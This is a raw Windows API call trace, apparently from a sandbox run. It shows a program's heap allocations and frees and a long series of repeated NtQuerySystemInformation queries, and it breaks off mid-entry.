1 [0286.200] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0286.200] NtQuerySystemInformation (in: SystemInformationClass=0x86, SystemInformation=0xa78217f310, Length=0x20, ResultLength=0x0 | out: SystemInformation=0xa78217f310, ResultLength=0x0) returned 0x0 [0286.200] GetProcessHeap () returned 0x269489b0000 [0286.200] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c53be0 [0286.200] GetProcessHeap () returned 0x269489b0000 [0286.201] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x50) returned 0x26949c8ab60 [0286.201] GetProcessHeap () returned 0x269489b0000 [0286.201] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949bcdd70 [0286.201] GetProcessHeap () returned 0x269489b0000 [0286.201] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d1670 [0286.202] GetProcessHeap () returned 0x269489b0000 [0286.202] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x40) returned 0x26949c2f740 [0286.202] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a00b20 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bce5b0 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1790 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c53a60 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949710800 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0d960 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c8ab60 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcdd70 | out: hHeap=0x269489b0000) returned 1 [0289.397] GetProcessHeap () returned 0x269489b0000 [0289.397] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1670 | out: hHeap=0x269489b0000) returned 1 [0289.398] GetProcessHeap () returned 0x269489b0000 [0289.398] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c53be0 | out: hHeap=0x269489b0000) returned 1 [0289.398] GetProcessHeap () returned 0x269489b0000 [0289.398] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c2f5b0 | out: hHeap=0x269489b0000) returned 1 [0289.399] GetProcessHeap () returned 0x269489b0000 [0289.399] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a0d850 | out: hHeap=0x269489b0000) returned 1 [0289.399] GetProcessHeap () returned 0x269489b0000 [0289.399] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949c2f740 | out: hHeap=0x269489b0000) returned 1 [0289.399] GetProcessHeap () returned 0x269489b0000 [0289.399] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26949bcc400 | out: hHeap=0x269489b0000) returned 1 [0289.399] GetProcessHeap () returned 0x269489b0000 [0289.399] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x269499d1510 | out: hHeap=0x269489b0000) returned 1 [0289.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.405] GetProcessHeap () returned 0x269489b0000 [0289.406] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x230) returned 0x26948a2b7c0 [0289.406] GetProcessHeap () returned 0x269489b0000 [0289.406] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c763f0 [0289.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edc0, Length=0x50, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edc0, Length=0x50, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edc0, Length=0x50, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecb0, Length=0x50, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecb0, Length=0x50, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecb0, Length=0x50, ResultLength=0x0) [0289.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecb0, Length=0x50, ResultLength=0x0) [0289.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x38, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x28, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x28, ResultLength=0x0) [0289.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x28, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x28, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea80, Length=0x28, ResultLength=0x0) [0289.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x38, ResultLength=0x0) [0289.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x28, ResultLength=0x0) [0289.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb00, Length=0x28, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x20, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x20, ResultLength=0x0) [0289.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x20, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x38, ResultLength=0x0) [0289.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x38, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x20, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9f0, Length=0x20, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9f0, Length=0x20, ResultLength=0x0) [0289.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc30, Length=0x50, ResultLength=0x0) [0289.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc30, Length=0x50, ResultLength=0x0) [0289.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc30, Length=0x50, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x50, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x50, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x50, ResultLength=0x0) [0289.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x50, ResultLength=0x0) [0289.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da50, Length=0x38, ResultLength=0x0) [0289.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d880, Length=0x28, ResultLength=0x0) [0289.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d880, Length=0x28, ResultLength=0x0) [0289.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d880, Length=0x28, ResultLength=0x0) [0289.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d880, Length=0x28, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8f0, Length=0x28, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da50, Length=0x38, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x28, ResultLength=0x0) [0289.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d970, Length=0x28, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d810, Length=0x20, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d790, Length=0x20, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d790, Length=0x20, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d790, Length=0x20, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da50, Length=0x38, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da50, Length=0x38, ResultLength=0x0) [0289.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d8d0, Length=0x20, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d860, Length=0x20, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d860, Length=0x20, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dad0, Length=0x28, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db40, Length=0x28, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbc0, Length=0x28, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dbc0, Length=0x28, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x20, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217daa0, Length=0x20, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dca0, Length=0x38, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217db20, Length=0x20, ResultLength=0x0) [0289.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dab0, Length=0x20, ResultLength=0x0) [0289.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dab0, Length=0x20, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de80, Length=0x50, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd70, Length=0x50, ResultLength=0x0) [0289.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 